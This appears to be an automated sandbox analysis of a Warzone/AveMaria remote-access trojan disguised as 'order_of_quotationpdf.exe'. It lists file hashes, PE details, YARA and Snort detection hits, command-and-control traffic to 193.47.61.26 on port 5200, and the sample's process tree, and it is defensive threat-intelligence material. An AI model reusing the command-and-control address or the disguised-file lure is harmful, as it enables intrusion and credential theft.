	UrQrIdRfCg.exe	Get hash	malicious	Unknown	Browse	202.61.192.193
	file.exe	Get hash	malicious	RedLine	Browse	193.47.61.37
	http://moncry.surge.sh	Get hash	malicious	Unknown	Browse	202.61.204.169
	http://www.wcwpartners.com/wcw-organizational-effectiveness/wcw-organizational-effectiveness-executive-team-building/	Get hash	malicious	Unknown	Browse	202.61.129.39
	S#U0130PAR#U0130#U015e#U0130 190123.exe	Get hash	malicious	FormBook	Browse	202.61.232.163
	aaaceb896a7a8b0aa3c1946d93762420965c4328cfab4.exe	Get hash	malicious	RedLine	Browse	193.47.61.243
	aaaceb896a7a8b0aa3c1946d93762420965c4328cfab4.exe	Get hash	malicious	RedLine	Browse	193.47.61.243
	T5DqtxdGTJ.elf	Get hash	malicious	Mirai	Browse	202.61.233.7
	SecuriteInfo.com.W32.MSIL_Agent.EFE.gen.Eldorado.23840.4299.exe	Get hash	malicious	Remcos	Browse	193.47.61.33
	Swift copy.exe	Get hash	malicious	Remcos	Browse	193.47.61.33
	82oiZ14cNz.elf	Get hash	malicious	Unknown	Browse	193.47.61.42
	PO.exe	Get hash	malicious	Remcos	Browse	193.47.61.33
	MSKD223775563_BL914697207_MAERSK_AMAZON_INV20221211.exe	Get hash	malicious	Remcos	Browse	193.47.61.33
	hXxuQSTwbm.exe	Get hash	malicious	Unknown	Browse	193.47.61.54
	SecuriteInfo.com.Variant.Barys.340048.5425.25850.exe	Get hash	malicious	Remcos	Browse	193.47.61.33

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\order_of_quotationpdf.exe.log

Download File

Process:	C:\Users\user\Desktop\order_of_quotationpdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	1476
Entropy (8bit):	5.363352874313625
Encrypted:	false
SSDEEP:	24:ML9E4Ks2wKDE4KhK3VZ9pKhwE4BKIE4oKFKHKoZAE4Kzr7UE4KdE4KBLWE4Ks:MxHKXwYHKhQnowHBtHoxHhAHKzvUHKdn
MD5:	C3FB06CD3D168BE14FE3E521130B9D12
SHA1:	57894248590FB01DDFA2041DD20759156F765948
SHA-256:	AC10A0553135ECCF30E8B3127C0C30B956038E5CE2FAD95B5916DD3708FBDA32
SHA-512:	D23917C715937C88A60B4002BCAC6E03214BEEFBBA87E53AAD482B5E84D953BE2C854F098063CCCA1741A8A40865F62E73259EA113BE7CC555FDA8299FCC0D5B
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Net.Http\86d45445dab86720724016051271f5f9\System.Net.Http.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.X

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5829
Entropy (8bit):	4.902247628650607
Encrypted:	false
SSDEEP:	96:3CJ2Woe5F2k6Lm5emmXIGegyg12jDs+un/iQLEYFjDaeWJ6KGcmXs9smEFRLcU6j:Wxoe5FVsm5emdzgkjDt4iWN3yBGHc9s8
MD5:	F948233D40FE29A0FFB67F9BB2F050B5
SHA1:	9A815D3F218A9374788F3ECF6BE3445F14B414D8
SHA-256:	C18202AA4EF262432135AFF5139D0981281F528918A2EEA3858B064DFB66BE4F
SHA-512:	FD86A2C713FFA10FC083A34B60D7447DCB0622E83CC5992BBDAB8B3C7FEB7150999A68A8A9B055F263423478C0879ED462B7669FDE7067BC829D79DD3974787C
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	PSMODULECACHE.............Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script................T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	16484
Entropy (8bit):	5.552263312269732
Encrypted:	false
SSDEEP:	384:kte/s0qYVOlXplda3nYSBxn6ORiJ9gSSJ3uzp1mZYv:8DXpvMY4x6O1ScuzNv
MD5:	19B035D409E7848B6B5A2BBB543FD169
SHA1:	E725E54DE861DEE76B4665A87849B69267475C82
SHA-256:	9231C0F66DD8520B37E87CB3234BDD3C28FA44BB815FE1AACD2E0895BF56F949
SHA-512:	F1A6F5426B1664B70D1F14633366EC6A697E1359E1829CA06589CDB7E14CF048616F6F7E66EE0B4DDF6E945694180FF9D8ACB62A660FA00A0E817CBA22308F7B
Malicious:	false
Reputation:	low
Preview:	@...e...................w...........l.q...K..........@..........H...............<@.^.L."My...:'..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)........System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.............System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2enobkgw.zjo.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Reputation:	high, very likely benign file
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_matvrvpa.2uf.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Cfflo\Fjugfe.exe

Download File

Process:	C:\Users\user\Desktop\order_of_quotationpdf.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	5464064
Entropy (8bit):	5.980627007002903
Encrypted:	false
SSDEEP:	49152:UIoUnxXdZosToeyp2++zNccaBD19HY5VizkTuQCAlwHyTGhZMk:nnxos0pbB/
MD5:	3A222BA5C055F7E201AE3A121FE9DB9A
SHA1:	2D48A7A17E8923C26772554A74283F42B9627074
SHA-256:	0707A593AD8753E14A7B1DBA97A1889F039312FADED9165D76920A6C25BC8388
SHA-512:	F5098D4A28624228AF1902686BB805D14CF79A6CE186EE25D084E66CC9D13BE8B89E3FCCA391C1B2C403389144853C9BB1E995217DF11AB56A9A60841211FA06
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 5%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G.+d.................dO..........O.. ....O...@.. ........................S...........`.................................t.O.W.....O.......................S...................................................... ............... ..H............text....cO.. ...dO................. ..`.rsrc.........O......fO.............@..@.reloc........S......^S.............@..B..................O.....H.......\O1..4.......#...h#..............................................0..%........(.......-.&&...-.&&+.}....+.} ...+.....0.............-.&{....+.&+.....0.............-.&{ ...+.&+.....0..C........u.....-.&.,4+..+.(!....{.....{....o"...,.(#....{ ....{ ...o$......0..@....... .p..(!......-&{....o%...X )UU.Z(#......-.&{ ...o&...X+.&+.&+..0..h........r...p......%..{.....-.&........-.+..+.&.+.......o'....%..{ ....-.&....}...-.+..+.&.+...}...o'....((....0..%........(......

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Cfflo\Fjugfe.exe:Zone.Identifier

Download File

Process:	C:\Users\user\Desktop\order_of_quotationpdf.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	5.980627007002903
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	order_of_quotationpdf.exe
File size:	5464064
MD5:	3a222ba5c055f7e201ae3a121fe9db9a
SHA1:	2d48a7a17e8923c26772554a74283f42b9627074
SHA256:	0707a593ad8753e14a7b1dba97a1889f039312faded9165d76920a6c25bc8388
SHA512:	f5098d4a28624228af1902686bb805d14cf79a6ce186ee25d084e66cc9d13be8b89e3fcca391c1b2c403389144853c9bb1e995217df11ab56a9a60841211fa06
SSDEEP:	49152:UIoUnxXdZosToeyp2++zNccaBD19HY5VizkTuQCAlwHyTGhZMk:nnxos0pbB/
TLSH:	9A463985AFE44E1BE6F657F87426AAD8DDB0EC665AC7D30A300DB46A0F353410D83762
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...G.+d.................dO...........O.. ....O...@.. ........................S...........`................................

File Icon


Icon Hash:	fc9888c898ac9cd8

Static PE Info

General

Entrypoint:	0x8f83ce
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x642BF347 [Tue Apr 4 09:52:07 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4f8374	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4fa000	0x3f6fc	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x53a000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x4f63d4	0x4f6400	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x4fa000	0x3f6fc	0x3f800	False	0.0927003875492126	data	4.2043800323137255	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x53a000	0xc	0x200	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x4fa130	0x3f028	Device independent bitmap graphic, 244 x 512 x 32, image size 249856
RT_GROUP_ICON	0x539158	0x14	data
RT_VERSION	0x53916c	0x3dc	data
RT_MANIFEST	0x539548	0x1b4	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with very long lines (433), with no line terminators

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.4193.47.61.264970052002852357 04/04/23-12:52:48.811272	TCP	2852357	ETPRO TROJAN Ave Maria/Warzone RAT BeaconResponse	49700	5200	192.168.2.4	193.47.61.26
193.47.61.26192.168.2.45200497002852356 04/04/23-12:54:08.692284	TCP	2852356	ETPRO TROJAN Ave Maria/Warzone RAT InitializePacket	5200	49700	193.47.61.26	192.168.2.4
193.47.61.26192.168.2.45200497002851895 04/04/23-12:52:48.684674	TCP	2851895	ETPRO TROJAN Ave Maria/Warzone RAT Encrypted CnC Checkin (Inbound)	5200	49700	193.47.61.26	192.168.2.4
193.47.61.26192.168.2.45200497002038897 04/04/23-12:52:48.684674	TCP	2038897	ET TROJAN Warzone RAT Response (Inbound)	5200	49700	193.47.61.26	192.168.2.4
193.47.61.26192.168.2.45200497002851945 04/04/23-12:53:48.677120	TCP	2851945	ETPRO TROJAN Ave Maria/Warzone RAT PingCommand	5200	49700	193.47.61.26	192.168.2.4
192.168.2.4193.47.61.264970052002851946 04/04/23-12:53:48.677765	TCP	2851946	ETPRO TROJAN Ave Maria/Warzone RAT PingResponse	49700	5200	192.168.2.4	193.47.61.26

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 4, 2023 12:52:48.613923073 CEST	49700	5200	192.168.2.4	193.47.61.26
Apr 4, 2023 12:52:48.642028093 CEST	5200	49700	193.47.61.26	192.168.2.4
Apr 4, 2023 12:52:48.642847061 CEST	49700	5200	192.168.2.4	193.47.61.26
Apr 4, 2023 12:52:48.684674025 CEST	5200	49700	193.47.61.26	192.168.2.4
Apr 4, 2023 12:52:48.759718895 CEST	49700	5200	192.168.2.4	193.47.61.26
Apr 4, 2023 12:52:48.811271906 CEST	49700	5200	192.168.2.4	193.47.61.26
Apr 4, 2023 12:52:48.879832983 CEST	5200	49700	193.47.61.26	192.168.2.4
Apr 4, 2023 12:53:08.661104918 CEST	5200	49700	193.47.61.26	192.168.2.4
Apr 4, 2023 12:53:08.666598082 CEST	49700	5200	192.168.2.4	193.47.61.26
Apr 4, 2023 12:53:08.739007950 CEST	5200	49700	193.47.61.26	192.168.2.4
Apr 4, 2023 12:53:28.660896063 CEST	5200	49700	193.47.61.26	192.168.2.4
Apr 4, 2023 12:53:28.663130999 CEST	49700	5200	192.168.2.4	193.47.61.26
Apr 4, 2023 12:53:28.738893986 CEST	5200	49700	193.47.61.26	192.168.2.4
Apr 4, 2023 12:53:48.677119970 CEST	5200	49700	193.47.61.26	192.168.2.4
Apr 4, 2023 12:53:48.677764893 CEST	49700	5200	192.168.2.4	193.47.61.26
Apr 4, 2023 12:53:48.754565954 CEST	5200	49700	193.47.61.26	192.168.2.4
Apr 4, 2023 12:54:08.692284107 CEST	5200	49700	193.47.61.26	192.168.2.4
Apr 4, 2023 12:54:08.693494081 CEST	49700	5200	192.168.2.4	193.47.61.26
Apr 4, 2023 12:54:08.770104885 CEST	5200	49700	193.47.61.26	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 4, 2023 12:52:09.691754103 CEST	50982	53	192.168.2.4	8.8.8.8
Apr 4, 2023 12:52:09.832508087 CEST	60080	53	192.168.2.4	8.8.8.8
Apr 4, 2023 12:52:10.981992960 CEST	61105	53	192.168.2.4	8.8.8.8
Apr 4, 2023 12:52:11.073010921 CEST	56572	53	192.168.2.4	8.8.8.8

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Apr 4, 2023 12:52:09.691754103 CEST	192.168.2.4	8.8.8.8	0xa499	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Apr 4, 2023 12:52:09.832508087 CEST	192.168.2.4	8.8.8.8	0x672	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)	false
Apr 4, 2023 12:52:10.981992960 CEST	192.168.2.4	8.8.8.8	0xbac9	Standard query (0)	hv4wug.ch.files.1drv.com	A (IP address)	IN (0x0001)	false
Apr 4, 2023 12:52:11.073010921 CEST	192.168.2.4	8.8.8.8	0xa58c	Standard query (0)	hv4wug.ch.files.1drv.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Type	Class	DNS over HTTPS
Apr 4, 2023 12:52:09.759732962 CEST	8.8.8.8	192.168.2.4	0xa499	No error (0)	onedrive.live.com	web.fe.1drv.com	CNAME (Canonical name)	IN (0x0001)	false
Apr 4, 2023 12:52:09.759732962 CEST	8.8.8.8	192.168.2.4	0xa499	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net	CNAME (Canonical name)	IN (0x0001)	false
Apr 4, 2023 12:52:09.883665085 CEST	8.8.8.8	192.168.2.4	0x672	No error (0)	onedrive.live.com	web.fe.1drv.com	CNAME (Canonical name)	IN (0x0001)	false
Apr 4, 2023 12:52:09.883665085 CEST	8.8.8.8	192.168.2.4	0x672	No error (0)	web.fe.1drv.com	odc-web-geo.onedrive.akadns.net	CNAME (Canonical name)	IN (0x0001)	false
Apr 4, 2023 12:52:11.053029060 CEST	8.8.8.8	192.168.2.4	0xbac9	No error (0)	hv4wug.ch.files.1drv.com	ch-files.fe.1drv.com	CNAME (Canonical name)	IN (0x0001)	false
Apr 4, 2023 12:52:11.053029060 CEST	8.8.8.8	192.168.2.4	0xbac9	No error (0)	ch-files.fe.1drv.com	odc-ch-files-geo.onedrive.akadns.net	CNAME (Canonical name)	IN (0x0001)	false
Apr 4, 2023 12:52:11.127144098 CEST	8.8.8.8	192.168.2.4	0xa58c	No error (0)	hv4wug.ch.files.1drv.com	ch-files.fe.1drv.com	CNAME (Canonical name)	IN (0x0001)	false
Apr 4, 2023 12:52:11.127144098 CEST	8.8.8.8	192.168.2.4	0xa58c	No error (0)	ch-files.fe.1drv.com	odc-ch-files-geo.onedrive.akadns.net	CNAME (Canonical name)	IN (0x0001)	false

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: order_of_quotationpdf.exePID: 6752, Parent PID: 3528

General

Target ID:	0
Start time:	12:52:08
Start date:	04/04/2023
Path:	C:\Users\user\Desktop\order_of_quotationpdf.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\order_of_quotationpdf.exe
Imagebase:	0xe30000
File size:	5464064 bytes
MD5 hash:	3A222BA5C055F7E201AE3A121FE9DB9A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.401456152.0000000003747000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.401456152.0000000003747000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.401456152.0000000003747000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.401456152.0000000003747000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000000.00000002.401456152.0000000003747000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.402471739.0000000004749000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.402471739.0000000004749000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.402471739.0000000004749000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.402471739.0000000004749000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000000.00000002.402471739.0000000004749000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000000.00000002.404408183.00000000070A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.402471739.00000000046B1000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.402471739.00000000046B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.402471739.00000000046B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.402471739.00000000046B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000000.00000002.402471739.00000000046B1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown Rule: Codoso_Gh0st_1, Description: Detects Codoso APT Gh0st Malware, Source: 00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems) Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 00000000.00000002.401456152.00000000036A1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 6804, Parent PID: 6752

General

Target ID:	1
Start time:	12:52:18
Start date:	04/04/2023
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==
Imagebase:	0xe70000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7008, Parent PID: 6804

General

Target ID:	2
Start time:	12:52:19
Start date:	04/04/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: order_of_quotationpdf.exePID: 2956, Parent PID: 6752

General

Target ID:	3
Start time:	12:52:46
Start date:	04/04/2023
